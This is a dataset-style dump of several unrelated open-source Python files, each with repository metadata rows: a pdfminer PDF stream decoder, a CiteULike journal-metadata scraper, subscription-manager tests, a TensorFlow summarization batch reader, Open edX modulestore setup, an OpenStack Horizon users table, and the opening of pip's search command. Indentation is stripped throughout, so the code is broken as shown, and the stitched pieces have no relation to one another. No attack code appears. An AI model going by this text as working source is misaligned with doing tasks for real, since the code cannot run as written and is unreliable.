3L3N4/metagoofil | pdfminer/pdftypes.py | 26 | 7735 | #!/usr/bin/env python2
import sys
import zlib
from lzw import lzwdecode
from ascii85 import ascii85decode, asciihexdecode
from runlength import rldecode
from psparser import PSException, PSObject
from psparser import LIT, KWD, STRICT
LITERAL_CRYPT = LIT('Crypt')
# Abbreviation of Filter names in PDF 4.8.6. "Inline Images"
LITERALS_FLATE_DECODE = (LIT('FlateDecode'), LIT('Fl'))
LITERALS_LZW_DECODE = (LIT('LZWDecode'), LIT('LZW'))
LITERALS_ASCII85_DECODE = (LIT('ASCII85Decode'), LIT('A85'))
LITERALS_ASCIIHEX_DECODE = (LIT('ASCIIHexDecode'), LIT('AHx'))
LITERALS_RUNLENGTH_DECODE = (LIT('RunLengthDecode'), LIT('RL'))
LITERALS_CCITTFAX_DECODE = (LIT('CCITTFaxDecode'), LIT('CCF'))
LITERALS_DCT_DECODE = (LIT('DCTDecode'), LIT('DCT'))
## PDF Objects
##
class PDFObject(PSObject): pass
class PDFException(PSException): pass
class PDFTypeError(PDFException): pass
class PDFValueError(PDFException): pass
class PDFNotImplementedError(PSException): pass
## PDFObjRef
##
class PDFObjRef(PDFObject):
def __init__(self, doc, objid, _):
if objid == 0:
if STRICT:
raise PDFValueError('PDF object id cannot be 0.')
self.doc = doc
self.objid = objid
#self.genno = genno # Never used.
return
def __repr__(self):
return '<PDFObjRef:%d>' % (self.objid)
def resolve(self):
return self.doc.getobj(self.objid)
# resolve
def resolve1(x):
"""Resolves an object.
    If this is an array or dictionary, it may still contain
some indirect objects inside.
"""
while isinstance(x, PDFObjRef):
x = x.resolve()
return x
def resolve_all(x):
"""Recursively resolves the given object and all the internals.
Make sure there is no indirect reference within the nested object.
This procedure might be slow.
"""
while isinstance(x, PDFObjRef):
x = x.resolve()
if isinstance(x, list):
x = [ resolve_all(v) for v in x ]
elif isinstance(x, dict):
for (k,v) in x.iteritems():
x[k] = resolve_all(v)
return x
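# Illustrative usage sketch (added; not part of the original module):
#   obj = resolve1(ref)       # follows one chain of PDFObjRef indirection
#   obj = resolve_all(ref)    # also dereferences refs nested in lists/dicts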
def decipher_all(decipher, objid, genno, x):
"""Recursively deciphers the given object.
"""
if isinstance(x, str):
return decipher(objid, genno, x)
if isinstance(x, list):
x = [ decipher_all(decipher, objid, genno, v) for v in x ]
elif isinstance(x, dict):
for (k,v) in x.iteritems():
x[k] = decipher_all(decipher, objid, genno, v)
return x
# Type checking
def int_value(x):
x = resolve1(x)
if not isinstance(x, int):
if STRICT:
raise PDFTypeError('Integer required: %r' % x)
return 0
return x
def float_value(x):
x = resolve1(x)
if not isinstance(x, float):
if STRICT:
raise PDFTypeError('Float required: %r' % x)
return 0.0
return x
def num_value(x):
x = resolve1(x)
if not (isinstance(x, int) or isinstance(x, float)):
if STRICT:
raise PDFTypeError('Int or Float required: %r' % x)
return 0
return x
def str_value(x):
x = resolve1(x)
if not isinstance(x, str):
if STRICT:
raise PDFTypeError('String required: %r' % x)
return ''
return x
def list_value(x):
x = resolve1(x)
if not (isinstance(x, list) or isinstance(x, tuple)):
if STRICT:
raise PDFTypeError('List required: %r' % x)
return []
return x
def dict_value(x):
x = resolve1(x)
if not isinstance(x, dict):
if STRICT:
raise PDFTypeError('Dict required: %r' % x)
return {}
return x
def stream_value(x):
x = resolve1(x)
if not isinstance(x, PDFStream):
if STRICT:
raise PDFTypeError('PDFStream required: %r' % x)
return PDFStream({}, '')
return x
## PDFStream type
##
class PDFStream(PDFObject):
def __init__(self, attrs, rawdata, decipher=None):
assert isinstance(attrs, dict)
self.attrs = attrs
self.rawdata = rawdata
self.decipher = decipher
self.data = None
self.objid = None
self.genno = None
return
def set_objid(self, objid, genno):
self.objid = objid
self.genno = genno
return
def __repr__(self):
if self.data is None:
assert self.rawdata is not None
return '<PDFStream(%r): raw=%d, %r>' % (self.objid, len(self.rawdata), self.attrs)
else:
assert self.data is not None
return '<PDFStream(%r): len=%d, %r>' % (self.objid, len(self.data), self.attrs)
def __contains__(self, name):
return name in self.attrs
def __getitem__(self, name):
return self.attrs[name]
def get(self, name, default=None):
return self.attrs.get(name, default)
def get_any(self, names, default=None):
for name in names:
if name in self.attrs:
return self.attrs[name]
return default
def get_filters(self):
filters = self.get_any(('F', 'Filter'))
if not filters: return []
if isinstance(filters, list): return filters
return [ filters ]
def decode(self):
        assert self.data is None and self.rawdata is not None
data = self.rawdata
if self.decipher:
# Handle encryption
data = self.decipher(self.objid, self.genno, data)
filters = self.get_filters()
if not filters:
self.data = data
self.rawdata = None
return
for f in filters:
if f in LITERALS_FLATE_DECODE:
# will get errors if the document is encrypted.
try:
data = zlib.decompress(data)
except zlib.error:
data = ''
elif f in LITERALS_LZW_DECODE:
data = lzwdecode(data)
elif f in LITERALS_ASCII85_DECODE:
data = ascii85decode(data)
elif f in LITERALS_ASCIIHEX_DECODE:
data = asciihexdecode(data)
elif f in LITERALS_RUNLENGTH_DECODE:
data = rldecode(data)
elif f in LITERALS_CCITTFAX_DECODE:
#data = ccittfaxdecode(data)
raise PDFNotImplementedError('Unsupported filter: %r' % f)
elif f == LITERAL_CRYPT:
# not yet..
raise PDFNotImplementedError('/Crypt filter is unsupported')
else:
raise PDFNotImplementedError('Unsupported filter: %r' % f)
# apply predictors
params = self.get_any(('DP', 'DecodeParms', 'FDecodeParms'), {})
if 'Predictor' in params and 'Columns' in params:
pred = int_value(params['Predictor'])
columns = int_value(params['Columns'])
if pred:
if pred != 12:
raise PDFNotImplementedError('Unsupported predictor: %r' % pred)
buf = ''
ent0 = '\x00' * columns
for i in xrange(0, len(data), columns+1):
pred = data[i]
ent1 = data[i+1:i+1+columns]
if pred == '\x02':
ent1 = ''.join( chr((ord(a)+ord(b)) & 255) for (a,b) in zip(ent0,ent1) )
buf += ent1
ent0 = ent1
data = buf
self.data = data
self.rawdata = None
return
def get_data(self):
if self.data is None:
self.decode()
return self.data
def get_rawdata(self):
return self.rawdata
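# Usage sketch (added as documentation, not present in the original file):
# a stream obtained via stream_value() decodes its /Filter chain lazily, e.g.
#   raw = stream.get_rawdata()   # bytes exactly as stored in the PDF
#   data = stream.get_data()     # bytes after FlateDecode/LZW/etc. are applied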
| gpl-2.0 | 4,280,389,643,255,911,000 | 28.98062 | 100 | 0.559664 | false |
egonw/citeulike | plugins/python/cases.py | 2 | 3673 | #!/usr/bin/env python
import os, sys, re, urllib2, cookielib, string
from urllib import urlencode
from urllib2 import urlopen
from copy import copy
import BeautifulSoup
import htmlentitydefs
import socket
socket.setdefaulttimeout(15)
class ParseException(Exception):
pass
##
# Removes HTML or XML character references and entities from a text string.
#
# @param text The HTML (or XML) source text.
# @return The plain text, as a Unicode string, if necessary.
def unescape(text):
def fixup(m):
text = m.group(0)
if text[:2] == "&#":
# character reference
try:
if text[:3] == "&#x":
return unichr(int(text[3:-1], 16))
else:
return unichr(int(text[2:-1]))
except ValueError:
pass
else:
# named entity
try:
text = unichr(htmlentitydefs.name2codepoint[text[1:-1]])
except KeyError:
pass
return text # leave as is
return re.sub("&#?\w+;", fixup, text).encode('utf-8','ignore')
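# Example (added for illustration): unescape("Fish &amp; chips &#176;")
# returns the UTF-8 byte string "Fish & chips °".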
def meta(soup, key):
el = soup.find("meta", {'name':key})
if el:
return el['content'].encode('utf-8','ignore')
return None
def item(soup, entry, key):
el = meta(soup, key)
if el:
print "%s\t%s" % (entry, el)
def handle(url):
m = re.match(r'http://(?:www\.)?(jmedicalcasereports|casesjournal)\.com/(?:jmedicalcasereports|casesjournal)/article/view/(\d+)', url)
if not m:
raise ParseException, "URL not supported %s" % url
site = m.group(1)
wkey = m.group(2)
url = "http://%s.com/%s/article/viewArticle/%s" % (site, site, wkey)
page = urlopen(url).read()
soup = BeautifulSoup.BeautifulSoup(page)
head = soup.find("head")
doi = meta(head, 'citation_doi')
if not doi:
raise ParseException, "Cannot find DOI"
citation_pdf_url = meta(head, 'citation_pdf_url')
pdf_key = ""
if citation_pdf_url:
m = re.search(r'(\d+)/(\d+)', citation_pdf_url)
if m:
pdf_key = m.group(2)
print "begin_tsv"
print "linkout\tDOI\t\t%s\t\t" % (doi)
if site == "casesjournal":
print "linkout\tCASES\t%s\t\t%s\t" % (wkey, pdf_key)
elif site == "jmedicalcasereports":
print "linkout\tJMEDC\t%s\t\t%s\t" % (wkey, pdf_key)
else:
raise ParseException, "Unknown journal %s" % site
print "type\tJOUR"
title = meta(head, "citation_title")
if title:
print "title\t%s" % unescape(title)
item(head, "journal", "citation_journal_title")
item(head, "issue", "citation_issue")
item(head, "issn", "citation_issn")
date = meta(head, 'citation_date')
if date:
m = re.match(r'(\d+)/(\d+)/(\d+)', date)
if m:
day = m.group(1)
month = m.group(2)
year = m.group(3)
if year:
print "year\t%s" % year
if month:
print "month\t%s" % month
if day:
print "day\t%s" % day
# authors
authors = head.findAll("meta", {"name":"DC.Creator.PersonalName"})
if authors:
for a in authors:
print "author\t%s" % a['content'].encode('utf-8','ignore')
abstract = meta(head,"DC.Description")
if abstract:
abstract = abstract.strip()
abstract = re.sub(r'<[^>]+>','',abstract)
abstract = unescape(abstract)
abstract = abstract.strip()
print "abstract\t%s" % abstract
print "doi\t%s" % doi
print "end_tsv"
print "status\tok"
# read url from std input
url = sys.stdin.readline()
# get rid of the newline at the end
url = url.strip()
try:
handle(url)
except Exception, e:
import traceback
line = traceback.tb_lineno(sys.exc_info()[2])
print "\t".join(["status", "error", "There was an internal error processing this request. Please report this to [email protected] quoting error code %d." % line])
raise
| bsd-3-clause | -1,907,637,463,961,163,000 | 24.331034 | 164 | 0.622107 | false |
nguyenfilip/subscription-manager | test/test_rct_cert_command.py | 3 | 2207 | #
# Copyright (c) 2012 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import unittest
from mock import patch
from rhsm.certificate import CertificateException
from rct.cert_commands import RCTCertCommand
from subscription_manager.cli import InvalidCLIOptionError
class RCTCertCommandTests(unittest.TestCase):
def test_file_arg_required(self):
command = RCTCertCommand()
try:
command.main([])
self.fail("Expected InvalidCLIOptionError since no file arg.")
except InvalidCLIOptionError, e:
self.assertEqual("You must specify a certificate file.",
str(e))
def test_invalid_file_arg(self):
command = RCTCertCommand()
try:
command.main(["this_file_does_not_exist.crt"])
self.fail("Expected InvalidCLIOptionError since no file does not exist.")
except InvalidCLIOptionError, e:
self.assertEqual("The specified certificate file does not exist.", str(e))
@patch("os.path.isfile")
@patch("rhsm.certificate.create_from_file")
def test_valid_x509_required(self, mock_create, mock_isfile):
mock_create.side_effect = CertificateException("error!")
mock_isfile.return_value = True
command = RCTCertCommand()
command._do_command = lambda: command._create_cert()
try:
command.main(['dummy-file.pem'])
self.fail("Expected InvalidCLIOptionError since bad x509 file.")
except InvalidCLIOptionError, e:
self.assertEqual(
"Unable to read certificate file 'dummy-file.pem': error!",
str(e))
| gpl-2.0 | -6,185,564,035,410,825,000 | 37.719298 | 86 | 0.675578 | false |
alexgorban/models | research/textsum/batch_reader.py | 14 | 10400 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Batch reader to seq2seq attention model, with bucketing support."""
from collections import namedtuple
from random import shuffle
from threading import Thread
import time
import numpy as np
import six
from six.moves import queue as Queue
from six.moves import xrange
import tensorflow as tf
import data
ModelInput = namedtuple('ModelInput',
'enc_input dec_input target enc_len dec_len '
'origin_article origin_abstract')
BUCKET_CACHE_BATCH = 100
QUEUE_NUM_BATCH = 100
class Batcher(object):
"""Batch reader with shuffling and bucketing support."""
def __init__(self, data_path, vocab, hps,
article_key, abstract_key, max_article_sentences,
max_abstract_sentences, bucketing=True, truncate_input=False):
"""Batcher constructor.
Args:
data_path: tf.Example filepattern.
vocab: Vocabulary.
hps: Seq2SeqAttention model hyperparameters.
article_key: article feature key in tf.Example.
abstract_key: abstract feature key in tf.Example.
max_article_sentences: Max number of sentences used from article.
max_abstract_sentences: Max number of sentences used from abstract.
bucketing: Whether bucket articles of similar length into the same batch.
truncate_input: Whether to truncate input that is too long. Alternative is
to discard such examples.
"""
self._data_path = data_path
self._vocab = vocab
self._hps = hps
self._article_key = article_key
self._abstract_key = abstract_key
self._max_article_sentences = max_article_sentences
self._max_abstract_sentences = max_abstract_sentences
self._bucketing = bucketing
self._truncate_input = truncate_input
self._input_queue = Queue.Queue(QUEUE_NUM_BATCH * self._hps.batch_size)
self._bucket_input_queue = Queue.Queue(QUEUE_NUM_BATCH)
self._input_threads = []
for _ in xrange(16):
self._input_threads.append(Thread(target=self._FillInputQueue))
self._input_threads[-1].daemon = True
self._input_threads[-1].start()
self._bucketing_threads = []
for _ in xrange(4):
self._bucketing_threads.append(Thread(target=self._FillBucketInputQueue))
self._bucketing_threads[-1].daemon = True
self._bucketing_threads[-1].start()
self._watch_thread = Thread(target=self._WatchThreads)
self._watch_thread.daemon = True
self._watch_thread.start()
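  # Added note (not in the original file): the constructor above starts 16
  # daemon threads that parse tf.Examples into ModelInput tuples, 4 threads
  # that group those inputs into (optionally bucketed) batches, and a watcher
  # thread that restarts any worker that dies.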
def NextBatch(self):
"""Returns a batch of inputs for seq2seq attention model.
Returns:
enc_batch: A batch of encoder inputs [batch_size, hps.enc_timestamps].
dec_batch: A batch of decoder inputs [batch_size, hps.dec_timestamps].
target_batch: A batch of targets [batch_size, hps.dec_timestamps].
enc_input_len: encoder input lengths of the batch.
dec_input_len: decoder input lengths of the batch.
loss_weights: weights for loss function, 1 if not padded, 0 if padded.
origin_articles: original article words.
origin_abstracts: original abstract words.
"""
enc_batch = np.zeros(
(self._hps.batch_size, self._hps.enc_timesteps), dtype=np.int32)
enc_input_lens = np.zeros(
(self._hps.batch_size), dtype=np.int32)
dec_batch = np.zeros(
(self._hps.batch_size, self._hps.dec_timesteps), dtype=np.int32)
dec_output_lens = np.zeros(
(self._hps.batch_size), dtype=np.int32)
target_batch = np.zeros(
(self._hps.batch_size, self._hps.dec_timesteps), dtype=np.int32)
loss_weights = np.zeros(
(self._hps.batch_size, self._hps.dec_timesteps), dtype=np.float32)
origin_articles = ['None'] * self._hps.batch_size
origin_abstracts = ['None'] * self._hps.batch_size
buckets = self._bucket_input_queue.get()
for i in xrange(self._hps.batch_size):
(enc_inputs, dec_inputs, targets, enc_input_len, dec_output_len,
article, abstract) = buckets[i]
origin_articles[i] = article
origin_abstracts[i] = abstract
enc_input_lens[i] = enc_input_len
dec_output_lens[i] = dec_output_len
enc_batch[i, :] = enc_inputs[:]
dec_batch[i, :] = dec_inputs[:]
target_batch[i, :] = targets[:]
for j in xrange(dec_output_len):
loss_weights[i][j] = 1
return (enc_batch, dec_batch, target_batch, enc_input_lens, dec_output_lens,
loss_weights, origin_articles, origin_abstracts)
def _FillInputQueue(self):
"""Fill input queue with ModelInput."""
start_id = self._vocab.WordToId(data.SENTENCE_START)
end_id = self._vocab.WordToId(data.SENTENCE_END)
pad_id = self._vocab.WordToId(data.PAD_TOKEN)
input_gen = self._TextGenerator(data.ExampleGen(self._data_path))
while True:
(article, abstract) = six.next(input_gen)
article_sentences = [sent.strip() for sent in
data.ToSentences(article, include_token=False)]
abstract_sentences = [sent.strip() for sent in
data.ToSentences(abstract, include_token=False)]
enc_inputs = []
# Use the <s> as the <GO> symbol for decoder inputs.
dec_inputs = [start_id]
# Convert first N sentences to word IDs, stripping existing <s> and </s>.
for i in xrange(min(self._max_article_sentences,
len(article_sentences))):
enc_inputs += data.GetWordIds(article_sentences[i], self._vocab)
for i in xrange(min(self._max_abstract_sentences,
len(abstract_sentences))):
dec_inputs += data.GetWordIds(abstract_sentences[i], self._vocab)
# Filter out too-short input
if (len(enc_inputs) < self._hps.min_input_len or
len(dec_inputs) < self._hps.min_input_len):
tf.logging.warning('Drop an example - too short.\nenc:%d\ndec:%d',
len(enc_inputs), len(dec_inputs))
continue
# If we're not truncating input, throw out too-long input
if not self._truncate_input:
if (len(enc_inputs) > self._hps.enc_timesteps or
len(dec_inputs) > self._hps.dec_timesteps):
tf.logging.warning('Drop an example - too long.\nenc:%d\ndec:%d',
len(enc_inputs), len(dec_inputs))
continue
# If we are truncating input, do so if necessary
else:
if len(enc_inputs) > self._hps.enc_timesteps:
enc_inputs = enc_inputs[:self._hps.enc_timesteps]
if len(dec_inputs) > self._hps.dec_timesteps:
dec_inputs = dec_inputs[:self._hps.dec_timesteps]
# targets is dec_inputs without <s> at beginning, plus </s> at end
targets = dec_inputs[1:]
targets.append(end_id)
# Now len(enc_inputs) should be <= enc_timesteps, and
# len(targets) = len(dec_inputs) should be <= dec_timesteps
enc_input_len = len(enc_inputs)
dec_output_len = len(targets)
# Pad if necessary
while len(enc_inputs) < self._hps.enc_timesteps:
enc_inputs.append(pad_id)
while len(dec_inputs) < self._hps.dec_timesteps:
dec_inputs.append(end_id)
while len(targets) < self._hps.dec_timesteps:
targets.append(end_id)
element = ModelInput(enc_inputs, dec_inputs, targets, enc_input_len,
dec_output_len, ' '.join(article_sentences),
' '.join(abstract_sentences))
self._input_queue.put(element)
def _FillBucketInputQueue(self):
"""Fill bucketed batches into the bucket_input_queue."""
while True:
inputs = []
for _ in xrange(self._hps.batch_size * BUCKET_CACHE_BATCH):
inputs.append(self._input_queue.get())
if self._bucketing:
inputs = sorted(inputs, key=lambda inp: inp.enc_len)
batches = []
for i in xrange(0, len(inputs), self._hps.batch_size):
batches.append(inputs[i:i+self._hps.batch_size])
shuffle(batches)
for b in batches:
self._bucket_input_queue.put(b)
def _WatchThreads(self):
"""Watch the daemon input threads and restart if dead."""
while True:
time.sleep(60)
input_threads = []
for t in self._input_threads:
if t.is_alive():
input_threads.append(t)
else:
tf.logging.error('Found input thread dead.')
new_t = Thread(target=self._FillInputQueue)
input_threads.append(new_t)
input_threads[-1].daemon = True
input_threads[-1].start()
self._input_threads = input_threads
bucketing_threads = []
for t in self._bucketing_threads:
if t.is_alive():
bucketing_threads.append(t)
else:
tf.logging.error('Found bucketing thread dead.')
new_t = Thread(target=self._FillBucketInputQueue)
bucketing_threads.append(new_t)
bucketing_threads[-1].daemon = True
bucketing_threads[-1].start()
self._bucketing_threads = bucketing_threads
def _TextGenerator(self, example_gen):
"""Generates article and abstract text from tf.Example."""
while True:
e = six.next(example_gen)
try:
article_text = self._GetExFeatureText(e, self._article_key)
abstract_text = self._GetExFeatureText(e, self._abstract_key)
except ValueError:
tf.logging.error('Failed to get article or abstract from example')
continue
yield (article_text, abstract_text)
def _GetExFeatureText(self, ex, key):
"""Extract text for a feature from td.Example.
Args:
ex: tf.Example.
key: key of the feature to be extracted.
Returns:
feature: a feature text extracted.
"""
return ex.features.feature[key].bytes_list.value[0]
| apache-2.0 | 5,198,700,568,311,423,000 | 38.245283 | 80 | 0.637115 | false |
jelugbo/hebs_master | common/lib/xmodule/xmodule/modulestore/django.py | 17 | 6349 | """
Module that provides a connection to the ModuleStore specified in the django settings.
Passes settings.MODULESTORE as kwargs to MongoModuleStore
"""
from __future__ import absolute_import
from importlib import import_module
from django.conf import settings
if not settings.configured:
settings.configure()
from django.core.cache import get_cache, InvalidCacheBackendError
import django.utils
import re
import threading
from xmodule.util.django import get_current_request_hostname
import xmodule.modulestore # pylint: disable=unused-import
from xmodule.modulestore.mixed import MixedModuleStore
from xmodule.modulestore.draft_and_published import BranchSettingMixin
from xmodule.contentstore.django import contentstore
import xblock.reference.plugins
# We may not always have the request_cache module available
try:
from request_cache.middleware import RequestCache
HAS_REQUEST_CACHE = True
except ImportError:
HAS_REQUEST_CACHE = False
ASSET_IGNORE_REGEX = getattr(settings, "ASSET_IGNORE_REGEX", r"(^\._.*$)|(^\.DS_Store$)|(^.*~$)")
def load_function(path):
"""
Load a function by name.
path is a string of the form "path.to.module.function"
returns the imported python object `function` from `path.to.module`
"""
module_path, _, name = path.rpartition('.')
return getattr(import_module(module_path), name)
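# Illustrative example (added): load_function('django.core.cache.get_cache')
# is equivalent to `from django.core.cache import get_cache`.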
def create_modulestore_instance(engine, content_store, doc_store_config, options, i18n_service=None, fs_service=None):
"""
This will return a new instance of a modulestore given an engine and options
"""
class_ = load_function(engine)
_options = {}
_options.update(options)
FUNCTION_KEYS = ['render_template']
for key in FUNCTION_KEYS:
if key in _options and isinstance(_options[key], basestring):
_options[key] = load_function(_options[key])
if HAS_REQUEST_CACHE:
request_cache = RequestCache.get_request_cache()
else:
request_cache = None
try:
metadata_inheritance_cache = get_cache('mongo_metadata_inheritance')
except InvalidCacheBackendError:
metadata_inheritance_cache = get_cache('default')
if issubclass(class_, MixedModuleStore):
_options['create_modulestore_instance'] = create_modulestore_instance
if issubclass(class_, BranchSettingMixin):
_options['branch_setting_func'] = _get_modulestore_branch_setting
return class_(
contentstore=content_store,
metadata_inheritance_cache_subsystem=metadata_inheritance_cache,
request_cache=request_cache,
xblock_mixins=getattr(settings, 'XBLOCK_MIXINS', ()),
xblock_select=getattr(settings, 'XBLOCK_SELECT_FUNCTION', None),
doc_store_config=doc_store_config,
i18n_service=i18n_service or ModuleI18nService(),
fs_service=fs_service or xblock.reference.plugins.FSService(),
**_options
)
# A singleton instance of the Mixed Modulestore
_MIXED_MODULESTORE = None
def modulestore():
"""
Returns the Mixed modulestore
"""
global _MIXED_MODULESTORE # pylint: disable=global-statement
if _MIXED_MODULESTORE is None:
_MIXED_MODULESTORE = create_modulestore_instance(
settings.MODULESTORE['default']['ENGINE'],
contentstore(),
settings.MODULESTORE['default'].get('DOC_STORE_CONFIG', {}),
settings.MODULESTORE['default'].get('OPTIONS', {})
)
return _MIXED_MODULESTORE
def clear_existing_modulestores():
"""
Clear the existing modulestore instances, causing
them to be re-created when accessed again.
This is useful for flushing state between unit tests.
"""
global _MIXED_MODULESTORE # pylint: disable=global-statement
_MIXED_MODULESTORE = None
class ModuleI18nService(object):
"""
Implement the XBlock runtime "i18n" service.
Mostly a pass-through to Django's translation module.
django.utils.translation implements the gettext.Translations interface (it
has ugettext, ungettext, etc), so we can use it directly as the runtime
i18n service.
"""
def __getattr__(self, name):
return getattr(django.utils.translation, name)
def strftime(self, *args, **kwargs):
"""
A locale-aware implementation of strftime.
"""
# This is the wrong place to import this function. I'm putting it here
# because the xmodule test suite can't import this module, because
# Django is not available in that suite. This function isn't called in
# that suite, so this hides the import so the test won't fail.
#
# As I said, this is wrong. But Cale says this code will soon be
# refactored to a place that will be right, and the code can be made
# right there. If you are reading this comment after April 1, 2014,
# then Cale was a liar.
from util.date_utils import strftime_localized
return strftime_localized(*args, **kwargs)
def _get_modulestore_branch_setting():
"""
Returns the branch setting for the module store from the current Django request if configured,
else returns the branch value from the configuration settings if set,
else returns None
The value of the branch setting is cached in a thread-local variable so it is not repeatedly recomputed
"""
def get_branch_setting():
"""
Finds and returns the branch setting based on the Django request and the configuration settings
"""
branch = None
hostname = get_current_request_hostname()
if hostname:
# get mapping information which is defined in configurations
mappings = getattr(settings, 'HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS', None)
# compare hostname against the regex expressions set of mappings which will tell us which branch to use
if mappings:
for key in mappings.iterkeys():
if re.match(key, hostname):
return mappings[key]
if branch is None:
branch = getattr(settings, 'MODULESTORE_BRANCH', None)
return branch
# leaving this in code structured in closure-friendly format b/c we might eventually cache this (again)
# using request_cache
return get_branch_setting()
| agpl-3.0 | 2,187,341,260,609,576,700 | 34.272222 | 118 | 0.685305 | false |
xuweiliang/Codelibrary | openstack_dashboard/dashboards/admin/users/tables.py | 1 | 7776 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.template import defaultfilters
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext_lazy
from horizon import forms
from horizon import messages
from horizon import tables
from openstack_dashboard import api
from openstack_dashboard import policy
from openstack_dashboard import record_action
ENABLE = 0
DISABLE = 1
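# Added note: ENABLE/DISABLE index into the (enable, disable) message pairs
# returned by ToggleEnabled.action_present()/action_past() below.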
KEYSTONE_V2_ENABLED = api.keystone.VERSIONS.active < 3
class CreateUserLink(tables.LinkAction):
name = "create"
verbose_name = _("Create User")
url = "horizon:admin:users:create"
classes = ("ajax-modal",)
icon = "plus"
policy_rules = (('admin', 'admin:create_grant'),
("admin", "admin:create_user"),
("admin", "admin:list_roles"),
("admin", "admin:list_projects"),)
def allowed(self, request, user):
return api.keystone.keystone_can_edit_user()
class EditUserLink(policy.PolicyTargetMixin, tables.LinkAction):
name = "edit"
verbose_name = _("Edit")
url = "horizon:admin:users:update"
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (("admin", "admin:update_user"),
("admin", "admin:list_projects"),)
policy_target_attrs = (("user_id", "id"),)
def allowed(self, request, user):
return api.keystone.keystone_can_edit_user()
class ToggleEnabled(policy.PolicyTargetMixin, tables.BatchAction):
name = "toggle"
@staticmethod
def action_present(count):
return (
ungettext_lazy(
u"Enable User",
u"Enable Users",
count
),
ungettext_lazy(
u"Disable User",
u"Disable Users",
count
),
)
@staticmethod
def action_past(count):
return (
ungettext_lazy(
u"Enabled User",
u"Enabled Users",
count
),
ungettext_lazy(
u"Disabled User",
u"Disabled Users",
count
),
)
classes = ("btn-toggle",)
policy_rules = (("admin", "admin:update_user"),)
policy_target_attrs = (("user_id", "id"),)
def allowed(self, request, user=None):
if not api.keystone.keystone_can_edit_user():
return False
self.enabled = True
if not user:
return self.enabled
self.enabled = user.enabled
if self.enabled:
self.current_present_action = DISABLE
else:
self.current_present_action = ENABLE
return True
def update(self, request, user=None):
super(ToggleEnabled, self).update(request, user)
if user and user.id == request.user.id:
self.attrs["disabled"] = "disabled"
def action(self, request, obj_id):
user_data = api.keystone.user_get(request, obj_id)
if obj_id == request.user.id:
msg = _('You cannot disable the user you are '
'currently logged in as.')
messages.info(request, msg)
api.nova.systemlogs_create(request, user_data.name,
record_action.TOGGLEUSER, result=False, detail=msg)
return
if self.enabled:
api.keystone.user_update_enabled(request, obj_id, False)
self.current_past_action = DISABLE
flag = 'Disable '
else:
api.keystone.user_update_enabled(request, obj_id, True)
self.current_past_action = ENABLE
flag = 'Enable '
objectname = flag + 'User'
api.nova.systemlogs_create(request, user_data.name,
objectname, result=True, detail='-')
class DeleteUsersAction(policy.PolicyTargetMixin, tables.DeleteAction):
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Delete User",
u"Delete Users",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Deleted User",
u"Deleted Users",
count
)
policy_rules = (("admin", "admin:delete_user"),)
def allowed(self, request, datum):
        SystemName = ['glance', 'cinder', 'neutron', 'nova', 'admin', request.user.username]
self.result = True
self.detail = '-'
if datum is not None and datum.name in SystemName:
self.result = False
self.detail = _("Cannot allowed to delete user")
#if not api.keystone.keystone_can_edit_user() or \
# (datum and datum.id == request.user.id):
# return False
return False
return True
def delete(self, request, obj_id):
user_data = api.keystone.user_get(request, obj_id)
api.keystone.user_delete(request, obj_id)
class UserFilterAction(tables.FilterAction):
def filter(self, table, users, filter_string):
"""Naive case-insensitive search."""
q = filter_string.lower()
return [user for user in users
if q in user.name.lower()]
# if api.keystone.VERSIONS.active < 3:
# filter_type = "query"
# else:
# filter_type = "server"
# filter_choices = (("name", _("User Name ="), True),
# ("id", _("User ID ="), True),
# ("enabled", _("Enabled ="), True, _('e.g. Yes/No')))
class UpdateRow(tables.Row):
ajax = True
def get_data(self, request, user_id):
user_info = api.keystone.user_get(request, user_id, admin=True)
return user_info
class UsersTable(tables.DataTable):
STATUS_CHOICES = (
("true", True),
("false", False)
)
name = tables.Column('name', verbose_name=_('User Name'))
email = tables.Column('email', verbose_name=_('Email'),
filters=(lambda v: defaultfilters
.default_if_none(v, ""),
defaultfilters.escape,
defaultfilters.urlize)
)
# Default tenant is not returned from Keystone currently.
# default_tenant = tables.Column('default_tenant',
# verbose_name=_('Default Project'))
#id = tables.Column('id', verbose_name=_('User ID'))
enabled = tables.Column('enabled', verbose_name=_('Enabled'),
status=True,
status_choices=STATUS_CHOICES,
filters=(defaultfilters.yesno,
defaultfilters.capfirst),
empty_value="False")
if api.keystone.VERSIONS.active >= 3:
domain_name = tables.Column('domain_name',
verbose_name=_('Domain Name'),
attrs={'data-type': 'uuid'})
class Meta(object):
name = "users"
verbose_name = _("Users")
row_actions = (EditUserLink, ToggleEnabled, DeleteUsersAction)
table_actions = (UserFilterAction, CreateUserLink, DeleteUsersAction)
row_class = UpdateRow
| apache-2.0 | 142,018,871,782,313,800 | 33.56 | 90 | 0.561214 | false |
ccellis/WHACK2016 | flask/lib/python2.7/site-packages/pip/commands/search.py | 344 | 4736 | import sys
import textwrap
import pip.download
from pip.basecommand import Command, SUCCESS
from pip.util import get_terminal_size
from pip.log import logger
from pip.backwardcompat import xmlrpclib, reduce, cmp
from pip.exceptions import CommandError
from pip.status_codes import NO_MATCHES_FOUND
